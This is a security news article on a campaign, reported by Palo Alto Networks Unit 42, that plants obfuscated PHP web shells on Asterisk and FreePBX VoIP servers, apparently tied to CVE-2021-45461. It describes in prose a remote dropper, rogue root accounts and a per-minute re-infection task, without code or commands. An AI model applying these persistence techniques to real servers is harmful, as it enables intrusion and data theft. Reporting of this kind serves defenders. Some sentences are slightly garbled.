VoIP phones using Digium’s software have been targeted to drop a web shell on their servers as part of an attack campaign designed to exfiltrate data by downloading and running additional payloads.
“The malware installs obfuscated multi-layered PHP backdoors on the web server’s file system, downloads new payloads to run, and schedules recurring tasks to re-infect the host system,” Palo Alto Networks Unit 42 said in a Friday report.
The unusual activity reportedly began in mid-December 2021 and targets Asterisk, a widely used software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications server.
Unit 42 said the intrusions share similarities with the INJ3CTOR3 campaign that Israeli cybersecurity firm Check Point disclosed in November 2020, hinting at the possibility that they could be a “resurgence” of previous attacks.
Coinciding with this sudden surge, the public disclosure in December 2021 of a now patched remote code execution flaw in FreePBX, an open-source, web-based GUI that is used to control and manage Asterisk. Tracked as CVE-2021-45461the problem is rated 9.8 out of 10 for its severity.
The attacks begin with the retrieval of an initial dropper shell script from a remote server, which in turn is orchestrated to install the PHP web shell in various locations in the filesystem and create two root user accounts. to maintain remote access.
It further creates a scheduled task that runs every minute and fetches a remote copy of the shell script from the attacker-controlled domain for execution.
Besides taking measures to cover its tracks, the malware is also equipped to execute arbitrary commands, ultimately allowing hackers to take control of the system, steal information, while maintaining a backdoor to compromised hosts.
“The strategy of planting web shells in vulnerable servers is not a new tactic for malicious actors,” the researchers said, adding that it is a “common approach taken by software authors.” malware to launch exploits or execute commands remotely”.